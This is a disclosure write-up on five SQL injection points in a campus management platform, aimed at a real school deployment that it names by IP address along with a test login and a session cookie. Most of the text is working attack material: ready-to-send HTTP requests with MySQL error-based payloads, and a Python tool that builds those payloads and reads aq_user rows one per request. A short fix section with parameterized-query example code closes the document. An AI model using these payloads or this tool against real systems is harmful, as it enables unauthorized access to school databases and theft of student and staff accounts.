General campus management platform SQL injection (five injection points)

Source: Internet
Author: User

Vendor: Beijing Lezhixing Software Co., Ltd. Official case list for the general campus management platform: http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml. The Beijing 101 Middle School deployment is used as the example below. Case URL: http://202.108.154.209/datacenter/# (test user: test123 / 123456).

First SQL injection:
1. Log in as an ordinary student user.
2. Weekly calendar -> Export calendar -> OK.
3. Send the following request. Link: http://202.108.154.209/oa/calendar/exportExcel.do

POST:exportStartDate=2014-03-03&exportEndDate=2014-03-04&exportCalendars=zhaojinfeng2%E6%97%A5%E5%8E%86&exportCalendarIds=16d07c5ff5e44036b5a44751ab2df91e') AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((user()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) and ('1'='1
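The request above, and the four that follow, all use the same MySQL error-based primitive: COUNT(*) over CONCAT(data, FLOOR(RAND(0)*2)) with a GROUP BY, which makes the server raise a duplicate-key error whose reported key is the data. The Python below is an added example, not code from the original write-up or from the vendor: it builds that payload around an arbitrary expression and pulls the leaked value out of MySQL's ER_DUP_ENTRY message. It also goes one step beyond the fifth injection by stepping the LIMIT offset so aq_user can be read one row per request. The error strings it parses are constructed samples, not responses captured from the target; the database user and the row values in them are made up.

```python
"""Added example: the error-based MySQL primitive shared by all five payloads.
Not code from the original write-up or from Lezhixing; the error strings
below are constructed samples."""
import re

# Core of every payload on this page. RAND(0) is a fixed sequence, so
# FLOOR(RAND(0)*2) repeats a key (0,1,1,0,1,1,...) while GROUP BY fills its
# temporary table; the second insert of a repeated key raises ER_DUP_ENTRY and
# the reported key is our CONCAT() string. At least three source rows are
# needed, hence the grouping over INFORMATION_SCHEMA.CHARACTER_SETS.
ERROR_BASED = ("(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,({inner}),0x23,"
               "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)")


def build_payload(value, inner, prefix="'", suffix=" AND 'a'='a"):
    """value + prefix + error-based subquery + suffix.

    prefix closes the quoting context the app puts the value in ("'" for the
    DWR string parameters, "')" for the exportCalendarIds IN-list); suffix
    leaves the statement balanced once the app appends its own closing quote.
    """
    return f"{value}{prefix} AND {ERROR_BASED.format(inner=inner)}{suffix}"


def aq_user_row_payload(offset):
    """Fifth injection generalized: one aq_user row per request via LIMIT n,1."""
    inner = f"SELECT concat(username,0x23,user_id) FROM aq_user LIMIT {offset},1"
    return build_payload("2", inner)


# MySQL: "Duplicate entry '<key>' for key 'group_key'" (newer servers write the
# key name as '<group_key>'; the pattern stops before it either way).
DUP_ENTRY = re.compile(r"Duplicate entry '(.*?)' for key '")


def extract_leak(error_text):
    """Return the data between the 0x23 ('#') markers of a duplicate-entry
    error, or None if the response carries no such error."""
    m = DUP_ENTRY.search(error_text)
    if not m:
        return None
    key = m.group(1)
    if key.startswith("#") and key.count("#") >= 2:
        return key[1:key.rfind("#")]
    # The first injection has no markers (CONCAT(user(),FLOOR(...))):
    # the key is the data followed by the 0/1 digit, so drop that digit.
    return key[:-1]


def parse_aq_user(error_text):
    """Split the username#user_id pair leaked by aq_user_row_payload()."""
    leak = extract_leak(error_text)
    if leak is None or "#" not in leak:
        return None
    username, user_id = leak.split("#", 1)
    return username, user_id


# Constructed sample responses (not captured from the target).
SAMPLE_USER_ERROR = ("java.sql.SQLException: Duplicate entry '#dbuser@localhost#1' "
                     "for key 'group_key'")
SAMPLE_ROW_ERROR = "Duplicate entry '#admin#0001#1' for key 'group_key'"

if __name__ == "__main__":
    # Reproduces the shape of the exportCalendarIds payload from the page.
    print(build_payload("16d07c5ff5e44036b5a44751ab2df91e", "user()",
                        prefix="')", suffix=" and ('1'='1"))
    print(extract_leak(SAMPLE_USER_ERROR))   # dbuser@localhost
    print(parse_aq_user(SAMPLE_ROW_ERROR))   # ('admin', '0001')
```

The error carries one key value per request, which is why the fifth injection selects with LIMIT 0,1; aq_user_row_payload(n) walks the table by raising the offset.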

 

The injected parameter is exportCalendarIds (the original write-up names exportCalendars; in the request above the payload is appended to the exportCalendarIds value and closes its quote and parenthesis with ')). After the request is sent a file is downloaded, and the injected content is in that file. Download and open the file: it contains the result of the injection (the error message carrying user()).

Second SQL injection:
1. Log in as an ordinary student user.
2. Pick a week in the calendar and modify an existing calendar entry (no new calendar is created), then save the change.
3. Capture the save request and modify the c0-e1 parameter. Send the modified request as follows:
POST /oa/dwr/call/plaincall/calendarRemoteCallController.saveEvent.dwr HTTP/1.1
Host: 202.108.154.209
Cookie: AQ_AUTHENTICATION_COOKIE_KEY=aae03b698ecd444aa0ae02f8d87c026a

callCount=1
windowName=pageContent
c0-scriptName=calendarRemoteCallController
c0-methodName=saveEvent
c0-id=0
c0-e1=string:0e362687769f426380ab1b8a015ef014' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT user()),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='a
c0-e2=string:
c0-e3=string:1111111111111
c0-e4=string:2014-03-04
c0-e5=string:2014-03-04
c0-e6=boolean:true
c0-e7=boolean:true
c0-e8=string:rgb(230%2C115%2C153)
c0-e9=number:1
c0-e10=null:null
c0-e11=string:-1
c0-e12=number:2
c0-e13=string:arrange
c0-e14=number:0
c0-e15=null:null
c0-e16=null:null
c0-e17=string:
c0-e18=string:
c0-e19=string:
c0-e20=string:
c0-e21=string:0
c0-param0=Object_Object:{id:reference:c0-e1, eventId:reference:c0-e2, title:reference:c0-e3, start:reference:c0-e4, end:reference:c0-e5, allDay:reference:c0-e6, editable:reference:c0-e7, backgroundColor:reference:c0-e8, priority:reference:c0-e9, calendarNameId:reference:c0-e10, remind:reference:c0-e11, privacy:reference:c0-e12, eventType:reference:c0-e13, eventStatus:reference:c0-e14, calendarProjectId:reference:c0-e15, arrangeRelation:reference:c0-e16, messageTaskId:reference:c0-e17, dutier:reference:c0-e18, parter:reference:c0-e19, site:reference:c0-e20, xlts:reference:c0-e21}
c0-param1=string:
c0-param2=boolean:false
c0-param3=boolean:true
batchId=25
page=%2Foa%2F%2Fcalendar%2FinitCalendar.do%3F__time__%3D1394571647842
httpSessionId=
scriptSessionId=4C1126686168926E787E3EBB1EA961EF


If an error is returned, the expected data appears in the error message: the injection succeeded.

Third SQL injection:
1. Log in as an ordinary student user.
2. Add "My Votes" to My Desktop and search by topic.
3. Capture the request and modify the criteria parameter. Note that criteria is sent by the client as a literal SQL WHERE fragment (theme like '%123%'), so the whole expression, not just a search value, is attacker-controlled. Send the following request:
POST /datacenter/vote/myVoteList.do HTTP/1.1
Host: 202.108.154.209
Cookie: AQ_AUTHENTICATION_COOKIE_KEY=aae03b698ecd444aa0ae02f8d87c026a

_search=false&nd=1394576122963&rows=50&page=1&sidx=from_date&sord=desc&criteria=theme+like+'%25123%25'+AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT user()),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='a'


The desired data is injected successfully.

Fourth SQL injection:
1. Log in as an ordinary student user.
2. My portal -> Add portal items -> Common Information.
3. Publish a common information item.
4. When publishing the item, capture the request and modify the id parameter. Send the following request. URL: http://202.108.154.209/oa//mail/personal/save.do
Cookie: AQ_AUTHENTICATION_COOKIE_KEY=aae03b698ecd444aa0ae02f8d87c026a
POST:privat=2&portlet=portlet&xxzt=complete&id=822b6cdadc7140fe91da513963d4efdc' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT user()),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) and 'a'='a&xxbt=222222&fbsf=个人:zhaojinfeng2&fjrsf=&info=<p>222222<br/></p>&editorValue=<p>222222<br/></p>


user() is injected successfully.

Fifth SQL injection:
1. Log in as an ordinary student user.
2. Go to My Desktop, add the desktop, and open Campus Office.
3. Go to the Mail Center.
4. Write a letter and preview it. The POST parameter c0-param0 of http://202.108.154.209/oa/dwr/call/plaincall/MailController.getNotReadtotalNumByClassify.dwr is injectable. Set c0-param0 to the value shown below to extract a username and user_id from the aq_user table; the error message then carries both. LIMIT 0,1 selects the first row, and the error can only carry one row per request, so other rows are read by raising the offset. Send the following request. Link: http://202.108.154.209/oa/dwr/call/plaincall/MailController.getNotReadtotalNumByClassify.dwr
POST:
callCount=1
windowName=
c0-scriptName=MailController
c0-methodName=getNotReadtotalNumByClassify
c0-id=0
c0-param0=string:2' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT concat(username,0x23,user_id) from aq_user limit 0,1),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='a
batchId=112
page=%2Fdatacenter%2Fportlet%2FshowPortletList.do%3FmenuId%3Ded57d3b21fff48738552a4601ed30e55
httpSessionId=
scriptSessionId=3756A70426EB76F99A0BBDDF3AC4FEBC




Solution: filter and validate the injected parameters on the server side. Escaping alone is not enough for criteria, sidx and sord, which are spliced into the statement as SQL text rather than as values: bind values with parameterized queries and whitelist column and sort identifiers.
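For the third injection the client sends criteria as a complete WHERE fragment, and sidx and sord as identifiers, so none of them can be fixed by escaping a value. The Python/sqlite3 below is an added example that serves both that injection and the solution line above; it is not the vendor's code and not the platform's real schema. It shows a handler that splices criteria the way the page's request implies, beside a replacement that accepts a structured (field, term) filter, whitelists every identifier and binds the search term. The table and column names (vote, aq_user, theme, from_date, password) and the rows are assumptions made only so the example runs offline.

```python
"""Added example: the myVoteList criteria parameter, vulnerable and fixed.
Not the vendor's code; schema and rows are assumptions."""
import sqlite3


def make_db():
    """In-memory stand-in for the platform database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE vote(id INTEGER PRIMARY KEY, theme TEXT, from_date TEXT);
        CREATE TABLE aq_user(user_id TEXT, username TEXT, password TEXT);
        INSERT INTO vote VALUES (1, 'Sports day 123', '2014-03-01'),
                                (2, 'Library hours', '2014-03-02');
        INSERT INTO aq_user VALUES ('0001', 'admin', 's3cret');
    """)
    return conn


def my_vote_list_vulnerable(conn, criteria, sidx="from_date", sord="desc"):
    """What the page's request implies: criteria (a SQL fragment), sidx and
    sord are spliced into the statement. The caller owns the whole WHERE
    clause, so any subquery it writes runs with the application's privileges."""
    sql = f"SELECT id, theme FROM vote WHERE {criteria} ORDER BY {sidx} {sord}"
    return conn.execute(sql).fetchall()


# Identifiers cannot be bound as parameters; they must come from a whitelist.
ALLOWED_FIELDS = {"theme", "from_date"}
ALLOWED_SORT = {"asc", "desc"}


def validate_filter(field, sidx, sord):
    """True only when every identifier the query will embed is whitelisted."""
    return field in ALLOWED_FIELDS and sidx in ALLOWED_FIELDS and sord in ALLOWED_SORT


def my_vote_list_safe(conn, field, term, sidx="from_date", sord="desc"):
    """Replacement: the client sends field + term, not SQL. Identifiers are
    whitelisted and the term is a bound parameter, so "OR 1=1" is only text."""
    if not validate_filter(field, sidx, sord):
        raise ValueError("unsupported filter or sort field")
    sql = f"SELECT id, theme FROM vote WHERE {field} LIKE ? ORDER BY {sidx} {sord}"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Intended use: one matching vote.
    print(my_vote_list_vulnerable(db, "theme like '%123%'"))
    # Attacker rewrites the fragment: every row comes back, and a subquery
    # against another table is evaluated (a boolean oracle on its result).
    print(my_vote_list_vulnerable(db, "theme like '%123%' OR 1=1"))
    print(my_vote_list_vulnerable(
        db, "theme like '%123%' AND (SELECT password FROM aq_user)='s3cret'"))
    # Fixed handler: the same text is now only a LIKE pattern.
    print(my_vote_list_safe(db, "theme", "123%' OR 1=1 --"))
```

The vulnerable handler cannot be repaired by escaping quotes, because the legitimate value already contains quotes and operators; the interface itself has to change so that SQL never crosses the trust boundary.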
